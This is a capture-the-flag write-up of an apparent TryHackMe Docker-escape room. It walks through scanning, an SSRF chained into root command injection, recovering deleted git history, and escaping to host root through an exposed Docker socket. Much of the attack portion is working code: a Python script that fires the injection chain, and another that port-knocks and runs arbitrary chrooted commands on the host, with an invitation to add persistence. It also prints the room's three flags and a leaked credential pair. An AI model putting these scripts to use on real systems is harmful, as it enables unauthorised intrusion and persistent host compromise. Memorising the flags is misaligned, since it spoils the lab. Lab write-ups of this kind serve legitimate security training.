Port scanning

sudo nmap --min-rate 10000 -p- 10.10.179.159 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 21:03 CST
Nmap scan report for 10.10.179.159
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

The machine was redeployed for the second session, so the address differs from the first scan:

sudo nmap -sT -sV -sC -O -p22,80 10.10.70.210
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 00:02 CST
Nmap scan report for 10.10.70.210 (10.10.70.210)
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| GenericLines:
|_ [AM)nZVux:OF
80/tcp open http nginx 1.19.6
|_http-title: docker-escape-nuxt
|_http-server-header: nginx/1.19.6
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.94%I=7%D=10/3%Time=651AE9B3%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,E,"\[AM\)nZVux:OF\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Web

The room hint is "wellknown", so one could generate a directory wordlist around it and brute-force; I just followed a walkthrough for this step. There is a .well-known directory:

feroxbuster --url=http://escape.thm/.well-known/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt  -x rar zip txt bak php html

gobuster did not work for me here. Under .well-known there is a security.txt (the standard RFC 9116 location for a site's security contact), and it points to /api/fl46, which has to be requested with HEAD:

curl -I http://escape.thm/api/fl46

flag1

THM{b801135794bf1ed3a2aafaa44c2e5ad4}

The directory scan also turned up robots.txt (nmap's http-robots.txt script had already flagged it):

User-agent: *
Allow: /
Disallow: /api/
# Disallow: /exif-util
Disallow: /*.bak.txt$

The /exif-util entry is commented out, but it still leaks the path, and nmap counted it among the three disallowed entries anyway.

/exif-util is an upload page with a URL field. Could that URL parameter be used for file inclusion?

There is also the /*.bak.txt$ pattern, so backup files exist somewhere; fuzzing for them did not turn up anything. The room hint says the developer left backup files lying around, so it is probably a backup of this application.

Trying aki.bak.txt and exif-util.bak.txt: the latter exists. It looks like a backup of the API call, roughly a GET request to the API with url as the parameter.

My guess is that the call lives under /api/exif, and api-dev-backup looks like a separate host, so try reaching it through the frontend's url parameter (server-side request forgery):

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif

Then try nesting a second url parameter for the dev API itself:

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif?url=http://localhost

The response says the command contains a banned word... so there is a filter on the dev API as well.

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif?url=1;whoami

So there is command injection, running as root, though on the api-dev-backup host rather than the frontend; most likely a container. The url value is evidently pasted into a shell command, which is why the ; separator works.
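The chain above works because each hop copies its url parameter into something else: the frontend fetches it, and the dev API hands it to a shell. As an added example, not part of the writeup, here is a small helper that builds the nested URL with proper per-hop percent-encoding and then peels it apart to show what each server will see. The host names and endpoints are the ones from the writeup; encoding each layer separately is my addition, and sending the result is left to a network helper.

```python
# Added example (not from the writeup): build the nested SSRF -> command
# injection URL with one layer of encoding per hop, then peel it back to
# confirm what each server will parse. Hosts/paths are those from the writeup.
from urllib.parse import urlencode, urlsplit, parse_qs
import urllib.request

FRONTEND_API = "http://escape.thm/api/exif"      # public hop: fetches its url= parameter
DEV_API = "http://api-dev-backup:8080/exif"      # internal dev API, only reachable via the hop above


def wrap(base, target):
    """Return base?url=<target> with target fully percent-encoded."""
    return f"{base}?{urlencode({'url': target})}"


def build_chain(payload):
    """Frontend -> dev API -> injected value.

    The inner request (DEV_API?url=<payload>) is encoded once more when it is
    placed in the outer url= parameter, so the '?', ';', '&' and spaces inside
    survive the frontend's query parsing and arrive intact at api-dev-backup.
    """
    return wrap(FRONTEND_API, wrap(DEV_API, payload))


def peel(url):
    """Simulate one server parsing its request: (endpoint, value of url=)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    endpoint = f"{parts.scheme}://{parts.netloc}{parts.path}"
    return endpoint, query.get("url", [None])[0]


def resolve_chain(url):
    """Peel every layer; returns the (endpoint, url value) pair seen at each hop."""
    hops = []
    while url:
        endpoint, nxt = peel(url)
        hops.append((endpoint, nxt))
        # keep peeling only while the forwarded value is itself a URL
        url = nxt if nxt and "://" in nxt else None
    return hops


def send(payload, timeout=10):
    """Fire the chain at the real target (network; not exercised by the test)."""
    with urllib.request.urlopen(build_chain(payload), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    chain = build_chain("1;whoami")
    print(chain)
    for endpoint, value in resolve_chain(chain):
        print(f"{endpoint}  sees url={value!r}")
```

The raw form used above, with the inner ?url= and the ; left unencoded, happened to work because the frontend forwarded the whole remainder of its query string; a parser that stops at the second ? or treats ; as a query-string separator would have truncated it. Encoding each layer removes that dependency and also keeps spaces and & inside the injected command intact.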

A /root/dev-note.txt turns up:

hydra/fluffybunnies123

But they work neither for SSH nor for the web login; the note says he deleted that stuff. Hmm.

Git

Exploring /root further, it turns out to be a git repository:

git log 
git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8

Check out the initial commit; whatever was "deleted" is still in the history.

ls again:

flag2

THM{0cb4b947043cb5c0486a454b75a10876}

Docker escape

Besides the flag, the original dev-note is back too:

knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port

So we need to hit these ports in sequence to open the Docker TCP port (port knocking)?

netcat will do. If the knock daemon silently drops packets to the closed ports, plain nc hangs waiting for the handshake; nc -z -w1 (scan mode, one-second timeout) sends the same SYN and returns immediately. Then rescan:

nc escape.thm 42
nc escape.thm 1337
nc escape.thm 10420
nc escape.thm 6969
nc escape.thm 63000
sudo nmap -A --min-rate 10000 -p- escape.thm

Port 2375, the Docker daemon's unauthenticated TCP socket, is now open. The image list below also explains the unrecognised port 22 from the first scan: endlessh is an SSH tarpit that slowly feeds random banner lines to whatever connects, which is exactly what nmap's fingerprint shows.

docker -H escape.thm images
REPOSITORY                                    TAG       IMAGE ID       CREATED       SIZE
exif-api-dev                                  latest    4084cb55e1c7   2 years ago   214MB
exif-api                                      latest    923c5821b907   2 years ago   163MB
frontend                                      latest    577f9da1362e   2 years ago   138MB
endlessh                                      latest    7bde5182dc5e   2 years ago   5.67MB
nginx                                         latest    ae2feff98a0c   2 years ago   133MB
debian                                        10-slim   4a9cd57610d6   2 years ago   69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   2 years ago   103MB
alpine                                        3.9       78a2ce922f86   3 years ago   5.55MB
docker -H escape.thm:2375 run -v /:/mnt --rm -it nginx chroot /mnt sh

This starts a container from the nginx image (any of the other images would do just as well), bind-mounts the host's root filesystem at /mnt and chroots into it. The daemon runs as root on the host and the socket has no authentication, so the resulting shell can read and write every file on the host: effectively host root. It is not a full host process context (the shell still lives in the container's namespaces), but it is enough to read the flag, drop an SSH key into /root/.ssh or edit /etc/shadow.
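The knock, the port check and the bind-mount escape are three separate tools above. As an added example (not from the writeup), here is the same sequence in one script that talks to the Docker Engine API over plain HTTP, so it works even where the docker CLI is unavailable. The host name, knock sequence and image name come from the writeup; the command run inside the chroot and the log demultiplexer are my additions; the Engine API endpoints used (/containers/create, /start, /wait, /logs) are the documented ones.

```python
# Added example (not from the writeup): knock the sequence from the dev-note,
# confirm 2375 opened, then do the bind-mount escape via the Docker Engine API
# directly. Host, sequence and image are from the writeup; the chroot command
# and the stream demultiplexer are this example's own additions.
import json
import socket
import struct
import time
import urllib.request

HOST = "escape.thm"
KNOCK_SEQUENCE = [42, 1337, 10420, 6969, 63000]
DOCKER_PORT = 2375


def knock(host, ports, delay=0.3, timeout=1.0):
    """Send one TCP SYN per port, in order. The knock daemon only needs to see
    the SYN, so a refused or dropped connection is fine; never wait for data."""
    for port in ports:
        with socket.socket() as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                pass
        time.sleep(delay)


def tcp_open(host, port, timeout=2.0):
    """True if a TCP handshake to host:port completes."""
    with socket.socket() as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def create_payload(image, shell_cmd, host_root="/"):
    """Body for POST /containers/create: bind the host root at /mnt, chroot into it."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/mnt", "sh", "-c", shell_cmd],
        "HostConfig": {"Binds": [f"{host_root}:/mnt"]},
    }


def demux_logs(raw):
    """Split the multiplexed stream from GET /containers/{id}/logs (non-TTY):
    each frame is 1 byte stream type (1=stdout, 2=stderr), 3 zero bytes,
    a 4-byte big-endian length, then the payload."""
    out, err, pos = b"", b"", 0
    while pos + 8 <= len(raw):
        stream = raw[pos]
        (length,) = struct.unpack(">I", raw[pos + 4:pos + 8])
        chunk = raw[pos + 8:pos + 8 + length]
        if stream == 2:
            err += chunk
        else:
            out += chunk
        pos += 8 + length
    return out.decode(errors="replace"), err.decode(errors="replace")


def api(host, method, path, body=None):
    """One unauthenticated Engine API call over the TCP socket (network)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(f"http://{host}:{DOCKER_PORT}{path}", data=data, method=method)
    if data is not None:
        req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


def escape(host, image="nginx", shell_cmd="id; cat /etc/hostname"):
    """Run shell_cmd chrooted into the host filesystem; returns (stdout, stderr)."""
    created = json.loads(api(host, "POST", "/containers/create", create_payload(image, shell_cmd)))
    cid = created["Id"]
    api(host, "POST", f"/containers/{cid}/start")
    api(host, "POST", f"/containers/{cid}/wait")          # block until the command exits
    raw = api(host, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    api(host, "DELETE", f"/containers/{cid}")             # tidy up like --rm
    return demux_logs(raw)


if __name__ == "__main__":
    knock(HOST, KNOCK_SEQUENCE)
    if not tcp_open(HOST, DOCKER_PORT):
        raise SystemExit("docker port still closed; check the knock sequence and timing")
    stdout, stderr = escape(HOST)
    print(stdout, stderr, sep="")
```

The chroot binary comes from the container image while sh and everything it runs come from the host's filesystem under /mnt, which is why the command output reflects the host. Replace the default shell_cmd with whatever persistence step you need, and note that knock daemons usually impose a per-knock timeout, so keep the delay between SYNs short.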

flag3

THM{c62517c0cad93ac93a92b1315a32d734}

Closing thoughts

Quite a hard box, especially the directory discovery, and I was fairly lost around the API calls. The Docker escape at the end was interesting though, and git showed up again as an old friend. I also learned a new escape technique.